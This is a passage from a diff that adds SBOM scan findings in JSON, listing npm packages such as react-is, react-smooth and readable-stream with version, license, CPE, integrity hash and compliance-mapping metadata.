"cpe:2.3:a:react_is:react_is:16.13.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react-is:16.13.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react_is:16.13.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/react-is@16.13.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz", + "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "320c91417fe22e47", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: react-is 18.3.1", + "title": "react-is 18.3.1", + "description": "Package discovered: react-is 18.3.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "756017d5bfb89c54", + "name": "react-is", + "version": "18.3.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:react-is:react-is:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react-is:react_is:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_is:react-is:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_is:react_is:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react-is:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react_is:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/react-is@18.3.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e00babcb3a543f4c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: react-promise-suspense 0.3.4", + "title": "react-promise-suspense 0.3.4", + "description": "Package discovered: react-promise-suspense 0.3.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "74a57b2250b339b3", + "name": "react-promise-suspense", + "version": "0.3.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:react-promise-suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react-promise-suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_promise_suspense:react-promise-suspense:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_promise_suspense:react_promise_suspense:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react-promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react-promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_promise:react-promise-suspense:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_promise:react_promise_suspense:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react-promise-suspense:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react_promise_suspense:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/react-promise-suspense@0.3.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/react-promise-suspense/-/react-promise-suspense-0.3.4.tgz", + "integrity": "sha512-I42jl7L3Ze6kZaq+7zXWSunBa3b1on5yfvUW6Eo/3fFOj6dZ5Bqmcd264nJbTK/gn1HjjILAjSwnZbV4RpSaNQ==", + "dependencies": { + "fast-deep-equal": "^2.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "45e27e6a5bb4b37b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: react-smooth 4.0.4", + "title": "react-smooth 4.0.4", + "description": "Package discovered: react-smooth 4.0.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "646f82a1b8ded3b2", + "name": "react-smooth", + "version": "4.0.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:react-smooth:react-smooth:4.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react-smooth:react_smooth:4.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_smooth:react-smooth:4.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_smooth:react_smooth:4.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react-smooth:4.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react_smooth:4.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/react-smooth@4.0.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/react-smooth/-/react-smooth-4.0.4.tgz", + "integrity": "sha512-gnGKTpYwqL0Iii09gHobNolvX4Kiq4PKx6eWBCYYix+8cdw+cGo3do906l1NBPKkSWx1DghC1dlWG9L2uGd61Q==", + "dependencies": { + "fast-equals": "^5.0.1", + "prop-types": "^15.8.1", + "react-transition-group": "^4.4.5" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8e8ac167acac7b76", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: react-transition-group 4.4.5", + "title": "react-transition-group 4.4.5", + "description": "Package discovered: react-transition-group 4.4.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "15c7effc6183b848", + "name": "react-transition-group", + "version": "4.4.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:react-transition-group:react-transition-group:4.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react-transition-group:react_transition_group:4.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_transition_group:react-transition-group:4.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_transition_group:react_transition_group:4.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react-transition:react-transition-group:4.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react-transition:react_transition_group:4.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_transition:react-transition-group:4.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_transition:react_transition_group:4.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react-transition-group:4.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react_transition_group:4.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/react-transition-group@4.4.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/react-transition-group/-/react-transition-group-4.4.5.tgz", + "integrity": "sha512-pZcd1MCJoiKiBR2NRxeCRg13uCXbydPnmB4EOeRrY7480qNWO8IIgQG6zlDkm6uRMsURXPuKq0GWtiM59a5Q6g==", + "dependencies": { + "@babel/runtime": "^7.5.5", + "dom-helpers": "^5.0.1", + "loose-envify": "^1.4.0", + "prop-types": "^15.6.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0cce3cd1fd3c13cf", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: read-cache 1.0.0", + "title": "read-cache 1.0.0", + "description": "Package discovered: read-cache 1.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5f64d7de79050a02", + "name": "read-cache", + "version": "1.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:read-cache:read-cache:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:read-cache:read_cache:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:read_cache:read-cache:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:read_cache:read_cache:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:read:read-cache:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:read:read_cache:1.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/read-cache@1.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/read-cache/-/read-cache-1.0.0.tgz", + "integrity": "sha512-Owdv/Ft7IjOgm/i0xvNDZ1LrRANRfew4b2prF3OWMQLxLfu3bS8FVhCsrSCMK4lR56Y9ya+AThoTpDCTxCmpRA==", + "dependencies": { + "pify": "^2.3.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c7ae55737c4393af", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: readable-stream 2.3.8", + "title": "readable-stream 2.3.8", + "description": "Package discovered: readable-stream 2.3.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "deca1a198ab80d23", + "name": "readable-stream", + "version": "2.3.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:readable-stream:readable-stream:2.3.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:readable-stream:readable_stream:2.3.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:readable_stream:readable-stream:2.3.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:readable_stream:readable_stream:2.3.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:readable:readable-stream:2.3.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:readable:readable_stream:2.3.8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/readable-stream@2.3.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", + "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "303fe49ee8d1f69a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: readable-stream 3.6.2", + "title": "readable-stream 3.6.2", + "description": "Package discovered: readable-stream 3.6.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "066e44c97461677f", + "name": "readable-stream", + "version": "3.6.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:readable-stream:readable-stream:3.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:readable-stream:readable_stream:3.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:readable_stream:readable-stream:3.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:readable_stream:readable_stream:3.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:readable:readable-stream:3.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:readable:readable_stream:3.6.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/readable-stream@3.6.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", + "integrity": "sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==", + "dependencies": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + 